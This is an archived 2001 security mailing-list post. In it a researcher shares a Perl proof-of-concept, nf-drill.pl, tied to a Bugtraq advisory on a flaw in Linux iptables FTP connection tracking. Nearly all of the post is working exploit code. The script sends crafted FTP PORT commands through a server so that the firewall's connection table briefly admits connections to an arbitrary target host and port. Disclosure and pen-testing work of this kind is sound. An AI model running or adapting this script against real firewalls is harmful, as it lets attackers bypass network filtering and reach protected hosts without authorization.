Hi, The advisory on this should be going on Bugtraq, for whoever is interested -- this is a little tool that i wrote for it, since this is pen-test :) Curious thing is I actually discovered this in a pen-test. Cristiano Lincoln Mattos, CISSP, SSCP CESAR - Centro de Estudos e Sistemas Avançados do Recife #!/usr/bin/perl # # nf-drill.pl --- "Drill" holes open in Linux iptables connection table # Author: Cristiano Lincoln Mattos <lincolnat_private>, 2001 # # Advisory: http://www.tempest.com.br/advisories/linux-iptables # # Tempest Security Technologies - a business unit of: # CESAR - Centro de Estudos e Sistemas Avancados do Recife # # This code is licensed under the GPL. # use Socket; use Getopt::Long; use strict; # Option variables my $server; my $serverport = 21; my $host; my $port; my $verbose = 0; # Print function sub out { my ($level,$text) = @_; if (!$level || ($level && $verbose)) { print "$text"; } } my $opt = GetOptions("server=s" => \$server, "serverport=s" => \$serverport, "host=s" => \$host, "port=i" => \$port, "verbose" => \$verbose); if ($server eq "" || $host eq "" || $port eq "" || $port < 0 || $port > 65535) { print "Usage: $0 --server <ftp> [--serverport <port>] --host <target> --port <port> [--verbose]\n"; print " - server: specifies the FTP server (IP or hostname) to connect to\n"; print " - serverport: specifies the port of the FTP server -- default: 21\n"; print " - host: the IP of the target to open in the connection table\n"; print " - port: the port of the target to open in the connection table\n"; print " - verbose: sets verbose mode\n"; exit(0); } print "\n nf-blast.pl -- Cristiano Lincoln Mattos <lincoln\@cesar.org.br>, 2001\n"; print " Tempest Security Technologies\n\n"; # For the meanwhile, expecting an IP my @ip = split(/\./,$host); my $str = "PORT " . $ip[0] . "," . $ip[1] . "," . $ip[2] . "," . $ip[3] . "," . ($port >> 8) . "," . ($port % 256) . "\r\n"; # Socket init my $ipn = inet_aton($server); if (!$ipn) { out(0," Error: could not convert $server\n"); exit(0); } my $sin = sockaddr_in($serverport,$ipn); socket(Sock,PF_INET,SOCK_STREAM,6); if (!connect(Sock,$sin)) { out(0," Error: could not connect to $server:$serverport.\n"); exit(0); } out(0," - Connected to $server:$serverport\n"); my $buf; recv(Sock,$buf,120,0); chomp($buf); out(1," - RECV: $buf\n"); # First send a dummy one, just to establish the connection in the iptables logic send(Sock,$str,0); out(1," - SEND: $str"); recv(Sock,$buf,120,0); chomp($buf); out(1," - RECV: $buf\n"); # Now, send the one that will insert itself into the connection table send(Sock,$str,0); out(1," - SEND: $str"); recv(Sock,$buf,120,0); chomp($buf); out(1," - RECV: $buf\n"); out(0," * $server should now be able to connect to $host on port $port ! (for the next 10 seconds)\n"); out(0," - Closing connection to $server:$serverport.\n\n"); close(Sock);
This archive was generated by hypermail 2b30 : Mon Apr 16 2001 - 17:09:38 PDT